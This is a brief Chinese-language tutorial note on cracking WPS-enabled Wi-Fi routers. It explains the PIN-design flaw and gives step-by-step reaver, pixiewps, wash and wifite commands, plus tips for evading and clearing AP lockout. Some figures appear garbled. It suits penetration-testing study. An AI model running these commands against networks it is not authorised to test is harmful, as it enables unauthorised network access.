無線滲透_WPS攻擊

WPS(WIRELESS PROTECTED SETUP)

  • WPS是WIFI聯盟2006年開發的一項技術
    • 通過PIN碼來簡化無線接入的操作,無需記住PSK
    • 路由器和網卡各按一個按鈕就能接入無線
    • PIN碼是分為前後各4位的2段共8位數字
  • 安全漏洞
    • PSK:218,340,105,854,896
    • 2011年被發現安全涉及漏洞
    • 接入發起方可以根據路由器的返回信息判斷前4位是否正確
    • 而PIN碼的後4位只有1000種定義的組合(最後一位是checksum
    • 所以全部窮舉破解只需要11000次嘗試
    • 標準本身沒有設計鎖定機制,目前多個廠商已實現鎖定機制



  • 包括Linksys在內的很多廠家的無線路由器無法關閉WPS功能
  • 即使在WEB界面中有關閉WPS,配置也不會生效
  • 攻擊難度相對較低,防禦卻十分困難
  • 一般可在4-10小時內爆破密碼
    • PSK
  • 用計算機直接算出PIN
    • C83A35
    • 00B00C


實際流程

  • 啟動偵聽模式後,發現支持WPS的AP
  • wash -i wlan0mon
    #或者
    airodump-ng wlan0mon
    --wps


  • 爆破PIN碼
reaver -i wlan0mon -b <AP mac> -vv




  • 秒破PIN碼
reaver -i wlan0mon -b <AP mac> -vv -K 1

pixiewps

  • 只是使用固定廠商的晶元,成功率很低


  • 得到PIN碼之後就可以繼續破解
reaver -i wlan0mon -b <AP mac> -vv -p  [PIN碼]


問題:

  • 很多廠家實現了鎖定機制,所以爆破時應注意限速
  • 一旦觸發鎖定,可嘗試耗盡AP連接數,令其重啟並解除WPS鎖定


  • 綜合自動化無線密碼破解工具 wifite


  • 按住CRTL+C輸入編號即可進行攻擊




  • 等待之後就可以破解出來